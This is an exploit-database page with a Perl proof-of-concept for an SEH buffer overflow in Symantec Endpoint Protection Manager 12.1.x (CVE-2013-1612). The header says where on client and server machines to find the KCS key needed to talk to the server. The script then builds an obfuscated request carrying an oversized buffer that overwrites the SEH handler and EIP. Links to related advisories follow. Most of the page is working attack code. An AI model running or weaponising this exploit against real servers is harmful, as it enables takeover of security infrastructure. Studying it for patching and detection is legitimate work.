Lucene search
St3n1337DAY-ID-22189HistoryApr 27, 2014 - 12:00 a.m.
Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
2014-04-2700:00:00
st3n
0day.today
49
EPSS
0.172
Percentile
96.2%
#=====================================================================================
This POC code overwrite EIP with “CCCCCCCC”
About KCS Key: That key is used to obfuscate traffic between client and server.
The key is generated during SEPM installation.
We need that key to talk with the SEPM server…
Where to find KCS Key ?
On a managed client station. Search for “Kcs” inside:
- Win7/Vista/W2k8/and more :
C:\ProgramData\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Config\SyLink.xml
- Windows XP :
C:\Document & Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\
CurrentVersion\Data\Config\SyLink.xml
On server side, check the logs:
C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\data\inbox\log\ersecreg.log
#=====================================================================================
use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
# SEP Manager host/ip
my $host = "192.168.60.186";
my $port = 8014;
# Kcs key
my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E";
# ---- config end -----
# flush after every write
$| = 1;
# Send HTTP request function
sub send_request {
my $param = shift; # URL parameters
my $post_data = shift; # POST DATA
my $sock = IO::Socket::INET->new("$host:$port");
if($sock){
print "Connected.. \n";
# HTTP request
my $req =
"POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
"User-Agent: Smc\r\n" .
"Host: $host\r\n" .
"Content-Length: " . length($post_data) . "\r\n" .
"\r\n" .
$post_data ;
# Sending
print $sock $req;
# Read HTTP response
my $resp = '';
while(<$sock>){ $resp .=$_; }
#print $resp;
if($resp =~ /400 Bad Request/) {
print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
}
close $sock;
}
}
# SEP object
my $sep = SEPM::SEPM->new();
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
# Obfuscate URL parameters
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
"foo=[hex]" . # [hex] call the vulnerable parsing function
"F" x 1288 . # Junk
"B" x 8 . # Pointer to next SEH record
"CCCCCCCC". # SEH Handler, will overwrite EIP register
"D" x 500; # Trigger "Memory Access Violation" exception
# Sending request
print "[*] Sending HTTP request\n";
send_request($h, # URL parameters
$buf # post data
);
print "[*] Done\n";
# 0day.today [2018-03-05] #Related
exploitdb
exploitdb
Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)
2014-04-27 00:00:00
symantec
symantec
Symantec Endpoint Protection Manager/Protection Center 12.x Buffer Overflow
2013-06-18 08:00:00
checkpoint_advisories
checkpoint_advisories
prion
prion
Buffer overflow
2013-06-20 03:17:00
cve
cve
CVE-2013-1612
2013-06-20 03:17:30
seebug
seebug
Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
2014-07-01 00:00:00
exploitpack
exploitpack
Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)
2014-04-27 00:00:00
cvelist
cvelist
CVE-2013-1612
2013-06-20 01:00:00
nvd
nvd
CVE-2013-1612
2013-06-20 03:17:30
openvas
openvas
nessus
nessus